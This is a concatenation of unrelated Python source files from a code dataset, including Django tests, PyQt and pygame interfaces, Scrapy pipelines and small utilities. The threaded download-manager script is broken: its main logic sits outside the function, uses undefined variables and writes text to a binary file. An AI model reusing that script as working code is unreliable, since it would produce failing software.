john,),\n genres=(war, crime, comedy, adventure,))\n\n data = civil_war.similar\n\n expected = [ant_man.id, winter_soldier.id]\n result = [i.id for i in data]\n\n self.assertEqual(expected, result)\n self.assertEqual(10, fat.similar.count())\n\n\n@override_settings(\n CELERY_EAGER_PROPAGATES_EXCEPTIONS=True,\n CELERY_ALWAYS_EAGER=True,\n BROKER_BACKEND='memory')\nclass ImdbModelTest(TestCase):\n @responses.activate\n def setUp(self):\n logging.disable(logging.CRITICAL)\n\n responses.add(\n responses.GET,\n 'http://imdb.com/poster.jpg',\n status=200,\n content_type='application/json')\n\n responses.add(\n responses.GET,\n 'http://www.omdbapi.com/?i=tt0137523&plot=full&r=json',\n match_querystring=True,\n json={\n \"Title\": \"Fight Club\",\n \"Year\": \"1999\",\n \"Rated\": \"R\",\n \"Released\": \"15 Oct 1999\",\n \"Runtime\": \"139 min\",\n \"Genre\": \"Drama\",\n \"Director\": \"David Fincher\",\n \"Writer\": \"Chuck Palahniuk (novel), Jim Uhls (screenplay)\",\n \"Actors\": \"Edward Norton, Brad Pitt, Meat Loaf, Zach Grenier\",\n \"Plot\": \"A ticking-time-bomb insomniac and a slippery...\",\n \"Language\": \"English\",\n \"Country\": \"USA, Germany\",\n \"Awards\": \"Nominated for 1 Oscar. Another 8 wins & 31...\",\n \"Poster\": \"http://imdb.com/poster.jpg\",\n \"Metascore\": \"66\",\n \"imdbRating\": \"10\",\n \"imdbVotes\": \"1,314,286\",\n \"imdbID\": \"tt0137523\",\n \"Type\": \"movie\",\n \"Response\": \"True\"\n },\n status=200,\n content_type='application/json')\n\n self.imdb = ImdbFactory(imdb_id='tt0137523')\n\n def tearDown(self):\n # keep all clear after run tests.\n cleanup(self.imdb.movie)\n\n def test_get_str(self):\n expected = 'Synchronize %s with IMDB (%s)'\n expected %= (self.imdb.imdb_id, self.imdb.movie)\n self.assertEqual(expected, str(self.imdb))\n\n @responses.activate\n @mock.patch('movie.models.sync.delay')\n def test_if_post_save_is_connected(self, m_delay):\n self.imdb.save()\n m_delay.assert_called_once_with(self.imdb)\n\n @responses.activate\n @mock.patch('movie.tasks.logger.info')\n def test_try_synchronize_with_broken_api(self, m_logger):\n responses.add(\n responses.GET,\n 'http://www.omdbapi.com/?i=tt0000000&plot=full&r=json',\n match_querystring=True,\n status=500,\n content_type='application/json')\n\n # the factory will trigger the 'save' in model.\n imdb = ImdbFactory.create(imdb_id='tt0000000')\n\n message = 'unable to get data from IMDB to %s' % imdb.movie\n m_logger.assert_called_once_with(message)\n\n @responses.activate\n @mock.patch('movie.tasks.logger.info')\n def test_try_synchronize_with_failure_api(self, m_logger):\n responses.add(\n responses.GET,\n 'http://www.omdbapi.com/?i=tt0000000&plot=full&r=json',\n match_querystring=True,\n json={\"Error\": \"A friendly and comforting message.\"},\n status=200,\n content_type='application/json')\n\n imdb = ImdbFactory.create(imdb_id='tt0000000')\n\n message = 'unable to get data from IMDB to %s because: %s'\n message %= (imdb.movie, 'A friendly and comforting message.')\n\n m_logger.assert_called_once_with(message)\n\n @responses.activate\n def test_try_synchronize_movies_that_have_no_rating_yet(self):\n responses.add(\n responses.GET,\n 'http://imdb.com/poster.jpg',\n status=200,\n content_type='application/json')\n\n responses.add(\n responses.GET,\n 'http://www.omdbapi.com/?i=tt0803096&plot=full&r=json',\n match_querystring=True,\n json={\n \"Title\": \"Warcraft\",\n \"Year\": \"2016\",\n \"Rated\": \"PG-13\",\n \"Released\": \"10 Jun 2016\",\n \"Runtime\": \"123 min\",\n \"Genre\": \"Action, Adventure, Fantasy\",\n \"Director\": \"Duncan Jones\",\n \"Writer\": \"Duncan Jones (screenplay), Charles Leavitt (scr...\",\n \"Actors\": \"Travis Fimmel, Paula Patton, Ben Foster, Dominic..\",\n \"Plot\": \"The peaceful realm of Azeroth stands on the brink...\",\n \"Language\": \"English\",\n \"Country\": \"USA\",\n \"Awards\": \"N/A\",\n \"Poster\": \"http://imdb.com/poster.jpg\",\n \"Metascore\": \"N/A\",\n \"imdbRating\": \"N/A\",\n \"imdbVotes\": \"1,620\",\n \"imdbID\": \"tt0803096\",\n \"Type\": \"movie\",\n \"Response\": \"True\"\n },\n status=200,\n content_type='application/json')\n\n movie = MovieFactory(rating=0.0)\n imdb = ImdbFactory(imdb_id='tt0803096', movie=movie)\n\n self.assertEqual(0.0, imdb.movie.rating)\n\n\nclass MovieListViewTests(TestCase):\n def setUp(self):\n self.client = Client()\n\n drama = GenreFactory(name='Drama', slug='drama')\n thriller = GenreFactory(name='Thriller', slug='thriller')\n\n MovieFactory.create_batch(5, genres=(drama,))\n MovieFactory.create_batch(5, genres=(thriller,))\n MovieFactory.create_batch(5)\n\n def test_get(self):\n response = self.client.get(reverse('movie-list'))\n self.assertEqual(response.status_code, 200)\n\n def test_get_filtering_by_genre(self):\n url = reverse('movie-list-by-genre', args=('drama',))\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n\n movies = response.context['object_list']\n self.assertEqual(5, movies.count())\n\n\nclass MovieDetailViewTests(TestCase):\n def setUp(self):\n self.client = Client()\n\n MovieFactory.create_batch(5)\n\n morena = ActorFactory(name='Morena Baccarin')\n fabio = ActorFactory(name='Fabio Porchat')\n adele = ActorFactory(name='Adele Exarchopoulos')\n\n comedy = GenreFactory(name='Comedy')\n action = GenreFactory(name='Action')\n crime = GenreFactory(name='Crime')\n\n MovieFactory(\n title='Deadpool', genres=(comedy, action,), cast=(morena,))\n\n MovieFactory(\n title='Foo', genres=(crime, action,), cast=(morena, fabio, adele,))\n\n MovieFactory(\n title='Bar', genres=(comedy, action,), cast=(morena, adele,))\n\n def test_get(self):\n url = reverse('movie-detail', args=('deadpool',))\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n\n\nclass GenreDetailViewTests(TestCase):\n def setUp(self):\n self.client = Client()\n GenreFactory(name='Comedy', slug='comedy')\n\n def test_get(self):\n url = reverse('movie-list-by-genre', args=('comedy',))\n response = self.client.get(url)\n self.assertEqual(response.status_code, 200)\n","sub_path":"app/movie/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":11526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"185965304","text":"from typing import Any, Callable\nfrom time import perf_counter\nfrom functools import wraps\n\n\ndef timer_decorator(fn: Callable[..., Any]):\n \"\"\"\n timer_decorator calls fn and prints how long it took to execute.\n\n :param fn: The wrapped function.\n :return: The return value of the wrapped function.\n \"\"\"\n @wraps(fn)\n def wrapper(*args, **kwargs):\n start = perf_counter()\n retval = fn(*args, **kwargs)\n end = perf_counter()\n print(f'{fn.__module__}.{fn.__name__}:\\t{\"%.2f\" %(end-start)} seconds')\n return retval\n\n return wrapper","sub_path":"algorithms/utils/profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":583,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"130852612","text":"from itertools import islice\n\nimport subprocess\n\nMAX = 2000\n\ndef open_(𝚵, Ѵ, context):\n for target in context['targets']:\n logѫ = target['logѫ']\n Ѵ.command(f'echo \"{logѫ}\"')\n\n r = subprocess.run(['tail', '-n', str(MAX), logѫ.ƨ], stdout=subprocess.PIPE)\n ƨ = r.stdout.decode()\n\n lines = ƨ.split('\\n')[:-1]\n\n options = Ѵ.current.buffer.options\n options['modifiable'] = True\n Ѵ.current.buffer[:] = lines\n options['modifiable'] = False\n options['modified'] = False\n Ѵ.feedkeys('G')\n\ndef undo(𝚵, Ѵ, context):\n options = Ѵ.current.buffer.options\n options['modifiable'] = True\n Ѵ.feedkeys('u', options='n')\n options['modifiable'] = False\n options['modified'] = False\n\ndef redo(𝚵, Ѵ, context):\n options = Ѵ.current.buffer.options\n options['modifiable'] = True\n Ѵ.feedkeys('U', options='n')\n options['modifiable'] = False\n options['modified'] = False\n\ndef delete(𝚵, Ѵ, context):\n for target in context['targets']:\n import os\n\n logѫ = target['logѫ']\n Ѵ.command(f'echo \"{logѫ}\"')\n\n os.remove(logѫ.ƨ)\n\n options = Ѵ.current.buffer.options\n options['modifiable'] = True\n Ѵ.current.line = 'DROPPPPPPED'\n options['modifiable'] = False\n options['modified'] = False\n\ndef doAction(view, Ѵ, action, context):\n return DEFAULT_ACTIONS[action](view, Ѵ, context)\n\n\nDEFAULT_ACTIONS = {\n 'open': open_,\n 'undo': undo,\n 'redo': redo,\n 'delete': delete\n}\n","sub_path":"rplugin/python3/log/action.py","file_name":"action.py","file_ext":"py","file_size_in_byte":1559,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"68980288","text":"from threading import *\n\nclass BookMyBus:\n \n def __init__(self,availableSeats):\n self.availableSeats = availableSeats\n self.l = Semaphore()\n \n def buy(self,seatsRequested):\n self.l.acquire()\n print(\"Total seats available:\",self.availableSeats)\n \n if(self.availableSeats>=seatsRequested):\n print(\"Confirming a seat\")\n print(\"Processing the payment\")\n print(\"Printing the Ticket\")\n self.availableSeats-=seatsRequested\n else:\n print(\"Sorry.No seats available\")\n self.l.release()\n \n \nobj = BookMyBus(10) \nt1 = Thread(target=obj.buy,args=(3,))\nt2 = Thread(target=obj.buy,args=(4,))\nt3 = Thread(target=obj.buy,args=(4,))\n\nt1.start()\nt2.start()\nt3.start()","sub_path":"multithreading/bookmybus.py","file_name":"bookmybus.py","file_ext":"py","file_size_in_byte":782,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"191735674","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport jsonfield.fields\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('taxbrain', '0040_auto_20150204_1504'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='taxsaveinputs',\n name='tax_result',\n field=jsonfield.fields.JSONField(default=None, null=True, blank=True),\n preserve_default=True,\n ),\n ]\n","sub_path":"webapp/apps/taxbrain/migrations/0041_auto_20150225_1609.py","file_name":"0041_auto_20150225_1609.py","file_ext":"py","file_size_in_byte":505,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"370892269","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom .forms import orderForm\nfrom .models import OrderHist\n\norder = OrderHist()\n\n\ndef rendrer(request):\n # if this is a POST request we need to process the form data\n if request.method == 'POST':\n # create a form instance and populate it with data from the request:\n form = orderForm(request.POST)\n # check whether it's valid:\n if form.is_valid():\n order.pizza = form.cleaned_data['pizza']\n order.name = form.cleaned_data['name']\n order.address = form.cleaned_data['address']\n order.phone = form.cleaned_data['phone']\n order.save()\n return render(request, 'success.html', {'pizza':order.pizza, 'name':order.name, 'address':order.address, 'phone':order.phone})\n \n # if a GET (or any other method) we'll create a blank form\n else:\n form = orderForm()\n\n return render(request, 'index.html', {'form': form})\n\n","sub_path":"elmenu/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"576733249","text":"import sys, time, os\nimport numpy as np\nfrom os import getcwd, system\nfrom os.path import join\nfrom shutil import rmtree\nfrom run_makedata import main_predict, main_prep_qgis\nimport matplotlib as mpl\nmpl.use('Agg')\nimport matplotlib.pyplot as plt\nfrom PyQt5.QtWidgets import QApplication, QWidget, QLabel, QPushButton, QComboBox, QVBoxLayout, QFileDialog, QMessageBox, QTextBrowser\n\n\nfrom QgisIntegration.QgisStandalone import QgisStandalone\nfrom run_makedata import main_predict, main_prep_qgis\n\n\n\n\n\nclass MainForm(QWidget):\n def __init__(self, name = 'MainForm'):\n super(MainForm,self).__init__()\n self.setWindowTitle(name)\n self.cwd = getcwd() \n self.resize(600, 300) \n\n self.chosen_model = None\n self.output = None\n self.chosen_file = None\n self.save_path = None\n self.has_result = False\n\n self.textbox = QTextBrowser(self)\n self.textbox.resize(600, 200)\n self.textbox.setText('This is the documentation;This is the documentation;This is the documentation;\\nThis is the documentation;This is the documentation;This is the documentation;\\nThis is the documentation;')\n\n\n ## btn\n self.label1 = QLabel(\"Choose File:\", self)\n self.btn_chooseFile = QPushButton(\"Choose File\", self) \n\n self.label2 = QLabel(\"Select Model:\", self)\n self.btn_selectModel = QComboBox(self) \n self.btn_selectModel.addItems(['Choose Model', 'XGBOOST','DECISION TREE','SVM'])\n\n self.btn_runModel = QPushButton(\"Run Model\", self) \n\n self.label3 = QLabel(\"Choose Save Path:\", self)\n self.btn_chooseDir = QPushButton(\"Choose Save Path\", self) \n\n self.btn_exportResult = QPushButton(\"Export Result\", self) \n\n self.btn_runModel.setEnabled(False)\n self.btn_exportResult.setEnabled(False)\n\n\n\n\n\n layout = QVBoxLayout()\n layout.addWidget(self.textbox)\n layout.addWidget(self.label1)\n layout.addWidget(self.btn_chooseFile)\n layout.addWidget(self.label2)\n layout.addWidget(self.btn_selectModel)\n layout.addWidget(self.btn_runModel)\n layout.addWidget(self.label3)\n layout.addWidget(self.btn_chooseDir)\n layout.addWidget(self.btn_exportResult)\n self.setLayout(layout)\n\n\n self.btn_chooseFile.clicked.connect(self.slot_btn_chooseFile)\n self.btn_selectModel.activated[str].connect(self.slot_btn_selectModel)\n self.btn_runModel.clicked.connect(self.slot_btn_runModel)\n self.btn_chooseDir.clicked.connect(self.slot_btn_chooseDir)\n self.btn_exportResult.clicked.connect(self.slot_btn_exportResult)\n\n\n\n\n\n def slot_btn_chooseFile(self):\n self.chosen_file = QFileDialog.getExistingDirectory(self, \"getExistingDirectory\", \"./\") \n self.btn_chooseFile.setText(self.chosen_file)\n self.temp_dir = \"C:\\\\Users\\\\yhhjack\\\\Documents\\\\GitHub\\\\PAWS_SoftWare\\\\temp\\\\\" + str(int(time.time()))+'\\\\'\n os.mkdir(self.temp_dir)\n self.qgis = QgisStandalone(qgis_install_path=\"C:\\\\Program Files (x86)\\\\QGIS 2.18\",\n qgis_input_shp_path=self.chosen_file,\n qgis_output_shapefile_path=self.temp_dir+'shapefile',\n qgis_output_csv_path=self.temp_dir+'csvfile'\n )\n if self.chosen_model and self.chosen_file:\n self.btn_runModel.setEnabled(True)\n else:\n self.btn_runModel.setEnabled(False)\n return\n\n\n def slot_btn_selectModel(self, text):\n mapping = {'Choose Model': None, 'XGBOOST':'xgb','DECISION TREE':'dt','SVM':'svm'}\n self.chosen_model = mapping[text]\n if self.chosen_file and self.chosen_model:\n self.btn_runModel.setEnabled(True)\n else:\n self.btn_runModel.setEnabled(False)\n return\n\n\n def slot_btn_runModel(self):\n self.qgis.run()\n \n mapping = {'xgb':'XGBOOST','dt':'DECISION TREE','svm':'SVM'}\n QMessageBox.information(self, 'info1', 'Running {}, please wait'.format(mapping[self.chosen_model]))\n\n self.btn_runModel.setEnabled(False)\n self.btn_chooseFile.setEnabled(False)\n self.btn_selectModel.setEnabled(False)\n\n self.output = main_predict(self.temp_dir+'csvfile', self.chosen_model)\n rmtree(self.temp_dir)\n self.btn_runModel.setEnabled(True)\n self.btn_chooseFile.setEnabled(True)\n self.btn_selectModel.setEnabled(True)\n if self.output[0] == False:\n QMessageBox.information(self, 'info3', 'No such a file in selected path: {}.csv'.format(self.output[1]))\n else:\n self.has_result = True\n if self.save_path:\n self.btn_exportResult.setEnabled(True)\n QMessageBox.information(self, 'info1', 'Running {} finished'.format(mapping[self.chosen_model]))\n return\n\n def slot_btn_exportResult(self):\n QMessageBox.information(self, 'info2', 'Results are saved in \\n{}'.format(self.save_path))\n yea, mon, day, hou, minu, sec = list(time.localtime())[:6]\n name = '/PAWS%d_%02d_%02d_%02d_%02d_%02d.asc'%(yea, mon, day, hou, minu, sec)\n main_prep_qgis(self.output, self.save_path+name)\n pic = np.loadtxt(self.save_path+name, skiprows=6)\n plt.imshow(pic)\n plt.savefig(self.save_path+name.replace('asc','png'))\n return\n\n def slot_btn_chooseDir(self):\n dir_choose = QFileDialog.getExistingDirectory(self, \n \"Choose Path\", \n self.cwd) \n\n self.save_path = dir_choose\n self.btn_chooseDir.setText(dir_choose)\n if self.save_path and self.has_result:\n self.btn_exportResult.setEnabled(True)\n return\n\n\n\n\n def closeEvent(self, event): \n reply = QMessageBox.question(self,\n 'exit',\n \"Do you want to exit?\",\n QMessageBox.Yes | QMessageBox.No,\n QMessageBox.No)\n if reply == QMessageBox.Yes:\n event.accept()\n else:\n event.ignore()\n\n\n\nif __name__==\"__main__\":\n app = QApplication(sys.argv)\n mainForm = MainForm('Demo V1.0')\n mainForm.show()\n sys.exit(app.exec_())\n","sub_path":"Application/toy_model/frontend.py","file_name":"frontend.py","file_ext":"py","file_size_in_byte":6347,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"494551122","text":"#!/usr/bin/python3\n\nfrom scrapy.pipelines.images import ImagesPipeline\nfrom scrapy.http import Request\nfrom cnblogs_spider.items import CnblogsSpiderArticleItem,CnblogsSpiderAuthorItem,CnblogsSpiderAuthorAvatarItem\nfrom cnblogs_spider.mongodb_pipelines.mongodb_operate import mongodb_operate\nfrom scrapy.exceptions import DropItem\n\nclass Mongodb_Pipelines(object):\n #这个是个普通的pipeline,不支持下载用户头像的\n def process_item(self, item, spider):\n if isinstance(item, CnblogsSpiderAuthorItem):\n #组装一个DICT\n # print(\"keys={}\".format(item.keys()))\n # print(\"type=\",type(item.items()))\n auser = {}\n for akey in item.keys():\n auser[akey] = item[akey]\n print(\"auser=\",auser)\n if mongodb_operate.IsAuthorAccountNameExist(item[\"AuthorAccountName\"]) == 0:\n mongodb_operate.InsertAccount(auser)\n raise DropItem(\"在第一个pipeline终止\")\n else:\n return item\n\nclass Images_Pipelines(ImagesPipeline):\n #这个是imagepipeline\n def get_media_requests(self, item, info):\n if isinstance(item, CnblogsSpiderAuthorAvatarItem):\n picurl = 'http:'+ item['AuthorPicUrl']\n # print('picurl=',picurl)\n yield Request(picurl)\n else:\n return item\n\n def item_completed(self, results, item, info):\n if isinstance(item, CnblogsSpiderAuthorAvatarItem):\n item['AuthorPicLocalPath'] = [x['path'] for ok, x in results if ok]\n if len(item['AuthorPicLocalPath']) == 0:\n print(\"用户{}的头像下载失败,地址:{}\".format(item['AuthorAccountName'], item['AuthorPicUrl']))\n else:\n #写入数据库\n print(\"用户{}的头像下载成功,地址:{}\".format(item['AuthorAccountName'], item['AuthorPicUrl']))\n auser = {}\n for akey in item.keys():\n auser[akey] = item[akey]\n mongodb_operate.InsertAccountAvatar(auser)\n raise DropItem(\"在第二个pipeline终止\")\n else:\n return item","sub_path":"cnblogs_spider/mongodb_pipelines/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":2177,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"356390200","text":"def ft_len(str):\n a = 0\n for i in str:\n a += 1\n return a\n\n\ndef ft_odd_even_analysis_lst(lst):\n d = ft_len(lst)\n i = 0\n k2 = 0\n mx2 = lst[0]\n mn2 = lst[0]\n sum2 = 0\n k1 = 0\n mx1 = lst[1]\n mn1 = lst[1]\n sum1 = 0\n while d > i:\n if lst[i] % 2 == 0:\n k2 = k2 + 1\n if lst[i] > mx2:\n mx2 = lst[i]\n if lst[i] < mn2:\n mn2 = lst[i]\n sum2 = sum2 + lst[i]\n i = i + 1\n else:\n k1 = k1 + 1\n if lst[i] > mx1:\n mx1 = lst[i]\n if lst[i] < mn1:\n mn1 = lst[i]\n sum1 = sum1 + lst[i]\n i = i + 1\n print(\"Анализ списка:\\n\"\n \"Количество четных чисел:{},\\t\\tКоличество нечетных чисел:{},\\n\"\n \"Максимальная четная цифра:{},\\t\\tМаксимальная нечетная цифра:{},\\n\"\n \"Минимальная чентая цифра:{},\\t\\tМинимальная четная цифра:{},\\n\"\n \"Сумма четных чисел:{},\\t\\tСумма нечетных чисел:{},\"\n \"\".format(k2, k1, mx2, mx1, mn2, mn1, sum2, sum1))\n","sub_path":"ft_odd_even_analysis_lst.py","file_name":"ft_odd_even_analysis_lst.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"71247391","text":"import pygame\r\nimport pygame.gfxdraw\r\nimport game\r\nimport deco\r\nimport os\r\n\r\nclass MainMenuSurface(object):\r\n def __init__(self, game, *args, **kwargs):\r\n self.game = game # reference to game object\r\n\r\n self.surface = pygame.Surface(\r\n size = self.game.screen.get_size()\r\n )\r\n\r\n self.POINTER_INDEX = 0 # We're going to use this for our menu control\r\n self.LIST_MENU_OPTIONS = {\r\n \"New Game\" : self.game.start_new_game,\r\n 'Load Game' : self.load_game_screen,\r\n \"Settings\" : self.load_settings_manager,\r\n \"Exit\" : pygame.quit\r\n }\r\n self.LIST_MENU_POINT_POSITIONS = {\r\n # ID : Height\r\n }\r\n\r\n self.SECRET_PHRASE = []\r\n self.MENU_CUSTOM_TITLE_FONT = pygame.font.Font(\"./assets/pixellife.TTF\", 56)\r\n self.TITLE = \"FORSAKEN\"\r\n\r\n self.logo = pygame.image.load(\r\n './assets/logo.png'\r\n ).convert()\r\n\r\n self.background = pygame.image.load(os.path.join('assets', 'placeholder-backdrop.png')).convert()\r\n\r\n def event_hook(self, event):\r\n if event.type == pygame.KEYDOWN:\r\n if event.key == pygame.K_DOWN:\r\n self.POINTER_INDEX += 1 if self.POINTER_INDEX+1 < len(self.LIST_MENU_OPTIONS) else 0\r\n self.game.SoundHandle.attempt_play('menuswitch')\r\n elif event.key == pygame.K_UP:\r\n self.POINTER_INDEX -= 1 if self.POINTER_INDEX > 0 else 0\r\n self.game.SoundHandle.attempt_play('menuswitch')\r\n elif event.key == pygame.K_RETURN:\r\n # TODO: Make the text in the menu flash or something i don't know\r\n self.game.SoundHandle.attempt_play('menuselectdrastic')\r\n\r\n self.game.WindowHandle.do_with_fade(\r\n list(self.LIST_MENU_OPTIONS.values())[self.POINTER_INDEX]\r\n )\r\n\r\n self.SECRET_PHRASE.append(pygame.key.name(event.key))\r\n\r\n if len(self.SECRET_PHRASE) > 3:\r\n self.SECRET_PHRASE.pop(0)\r\n\r\n if self.SECRET_PHRASE == list('pog'):\r\n self.background = pygame.image.load(\r\n './assets/pog.jpg'\r\n ).convert()\r\n self.TITLE = \"POGGERS BRO\"\r\n\r\n def load_game_screen(self):\r\n print(\"not implemented yet again\")\r\n\r\n def load_settings_manager(self):\r\n print(\"no implemented settings\")\r\n\r\n def get_surface_menu_list(self):\r\n text_labels = []\r\n for index, o in enumerate(self.LIST_MENU_OPTIONS.keys()):\r\n sur = self.game.LARGE_FONT.render(\r\n o, # Text,\r\n True, # Antialias\r\n \"grey\", # Color of text\r\n None if self.POINTER_INDEX != index else pygame.color.Color(30, 30, 30, a=70)\r\n )\r\n text_labels.append(sur)\r\n\r\n longest_width = 0\r\n tallest_height = 0\r\n for label in text_labels:\r\n if label.get_width() > longest_width:\r\n longest_width = label.get_width()\r\n\r\n if label.get_height() > tallest_height:\r\n tallest_height = label.get_height() + 4\r\n\r\n total_height = tallest_height * len(text_labels) + (8 * len(text_labels))\r\n total_width = longest_width + 8\r\n\r\n menu_surface = pygame.Surface(\r\n (\r\n total_width,\r\n total_height\r\n ),\r\n pygame.SRCALPHA\r\n )\r\n\r\n #menu_surface.fill(pygame.Color(0, 0, 0, a=255))\r\n for index, o in enumerate(text_labels, start=0):\r\n h = index * tallest_height + 8\r\n self.LIST_MENU_POINT_POSITIONS[index] = h\r\n menu_surface.blit(\r\n o,\r\n (4, h)\r\n )\r\n\r\n return menu_surface\r\n\r\n def draw_surface(self):\r\n self.surface.fill(\r\n 'white'\r\n )\r\n\r\n self.surface.blit(\r\n pygame.transform.scale(\r\n self.background,\r\n (self.surface.get_width(), self.surface.get_height())\r\n ),\r\n (0, 0)\r\n )\r\n\r\n olSur = pygame.Surface(\r\n (\r\n self.surface.get_width(),\r\n self.surface.get_height()\r\n ),\r\n pygame.SRCALPHA\r\n )\r\n\r\n pygame.gfxdraw.filled_trigon(\r\n olSur,\r\n 0, -100, round(self.surface.get_width() / 2), self.surface.get_height(), 0, self.surface.get_height(), pygame.color.Color(30, 30, 30)\r\n )\r\n\r\n olSur.set_alpha(120)\r\n\r\n self.surface.blit(olSur, (0, 0))\r\n\r\n\r\n x=self.MENU_CUSTOM_TITLE_FONT.render(\r\n self.TITLE, True, 'white'\r\n )\r\n self.surface.blit(\r\n x,\r\n (\r\n (self.surface.get_width() - x.get_width()) / 4,\r\n (self.surface.get_height() - x.get_height()) / 7\r\n )\r\n )\r\n\r\n sml = self.get_surface_menu_list()\r\n self.surface.blit(\r\n sml,\r\n (\r\n (self.surface.get_width() - sml.get_width()) / 4,\r\n (self.surface.get_height() - sml.get_height()) / 2\r\n )\r\n )\r\n\r\n self.game.screen.blit(self.surface, (0, 0))\r\n","sub_path":"surfaces/startmenu.py","file_name":"startmenu.py","file_ext":"py","file_size_in_byte":5259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"300924958","text":"# N ote: This code will not work on online IDE\n\n# Importing the required packages\nimport click\nimport requests\nimport threading\n\n\n# The below code is used for each chunk of file handled\n# by each thread for downloading the content from specified\n# location to storage\ndef Handler(start, end, url, filename):\n # specify the starting and ending of the file\n headers = {'Range': 'bytes=%d-%d' % (start, end)}\n\n # request the specified part and get into variable\n r = requests.get(url, headers=headers, stream=True)\n\n # open the file and write the content of the html page\n # into file.\n with open(filename, \"r+b\") as fp:\n fp.seek(start)\n var = fp.tell()\n fp.write(r.content)\n\n\n# Note: This code will not work on online IDE\n\n@click.command(help=\"It downloads the specified file with specified name\")\n@click.option('—number_of_threads', default=4, help=\"No of Threads\")\n@click.option('--name', type=click.Path(), help=\"Name of the file with extension\")\n@click.argument('url_of_file', type=click.Path())\n@click.pass_context\n\ndef download_file(ctx, url_of_file, name, number_of_threads):\n r = requests.head(url_of_file)\n if name:\n file_name = name\n else:\n file_name = url_of_file.split('/')[-1]\n try:\n file_size = int(r.headers['content-length'])\n except:\n print\n \"Invalid URL\"\n return\n\n\n\npart = int(file_size) / number_of_threads\nfp = open(file_name, \"wb\")\nfp.write('\\0' * file_size)\nfp.close()\n\nfor i in range(number_of_threads):\n start = part * i\n end = start + part\n\n # create a Thread with start and end locations\n t = threading.Thread(target=Handler,\n kwargs={'start': start, 'end': end, 'url': url_of_file, 'filename': file_name})\n t.setDaemon(True)\n t.start()\n\n","sub_path":"downloadManager/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"100002128","text":"from django.test import TestCase, RequestFactory\nfrom django.urls import reverse\nfrom django.db import IntegrityError\nfrom rest_framework import status\nfrom rest_framework.exceptions import ErrorDetail\nfrom datetime import datetime\nimport pytz\nimport json\nfrom polls.models import *\nfrom accounts.models import *\nfrom django.contrib.auth.models import AnonymousUser\nfrom polls.serializers import * \n\n# Create your tests here.\n\ndef createTestAuthor():\n n = len(User.objects.all()) + 1\n author = User.objects.create_user(\n email=f\"test{n}@email.com\",\n password=\"password\",\n first_name=f\"TestFirst{n}\", \n last_name=f\"TestLast{n}\")\n return author\n\ndef createTestPoll():\n npolltimes = 3\n nparticipants = 4\n n = len(User.objects.all()) + 1\n author = createTestAuthor()\n poll = Poll.objects.create(\n name=f\"TestPoll{n}\", \n author=author, \n location=f\"TestLocation{n}\", \n notes=f\"TestNotes{n}\", \n timezone=f\"TestTimezone{n}\")\n timezone = pytz.timezone(\"America/New_York\")\n polltimes = [\n PollTime.objects.create(\n poll=poll, \n start=datetime(2018, 5, i+1, 20, 00, tzinfo=timezone), \n end=datetime(2018, 5, i+1, 21, 00, tzinfo=timezone)) \n for i in range(npolltimes)]\n participants = [\n Participant.objects.create(\n poll=poll, \n name=f\"Participant{i}\")\n for i in range(nparticipants)]\n [[Availability.objects.create(\n participant=participant, \n polltime=polltime, \n availability=\"N\") \n for participant in participants]\n for polltime in polltimes]\n return poll\n\nclass UserModelTest(TestCase):\n def test_unique_email(self):\n with self.assertRaises(IntegrityError):\n User.objects.create_user(email=\"user@user.com\", password=\"password\", first_name=\"User1\", last_name=\"User1\")\n User.objects.create_user(email=\"user@user.com\", password=\"password\", first_name=\"User2\", last_name=\"User2\")\n\nclass ParticipantSerializerTests(TestCase):\n def setUp(self):\n self.test_poll = createTestPoll()\n\n def test_serialize_participant(self):\n participant = self.test_poll.participants.first()\n expected_participant_data = {\n \"id\": participant.id,\n \"poll\": participant.poll.id,\n \"name\": participant.name,\n \"availability\": [\n {\"polltime\": availability.polltime.id, \"availability\": availability.availability} \n for availability in participant.availability.all()] \n }\n serializer = ParticipantSerializer(participant)\n self.assertEqual(serializer.data, expected_participant_data)\n\n def test_deserialize_missing_poll(self):\n polltimes = self.test_poll.polltimes.all()\n new_participant_data = {\n \"name\": \"New Participant\",\n \"availability\": [\n {\"polltime\": polltime.id, \"availability\": \"Y\"} \n for polltime in polltimes] \n }\n expected_error = {'poll': [ErrorDetail(string='This field is required.', code='required')]}\n serializer = ParticipantSerializer(data = new_participant_data)\n self.assertFalse(serializer.is_valid())\n self.assertEqual(serializer.errors, expected_error)\n \n def test_deserialize_missing_name(self):\n polltimes = self.test_poll.polltimes.all()\n new_participant_data = {\n \"poll\": self.test_poll.id,\n \"availability\": [\n {\"polltime\": polltime.id, \"availability\": \"Y\"} \n for polltime in polltimes] \n }\n expected_error = {'name': [ErrorDetail(string='This field is required.', code='required')]}\n serializer = ParticipantSerializer(data = new_participant_data)\n self.assertFalse(serializer.is_valid())\n self.assertEqual(serializer.errors, expected_error)\n\n def 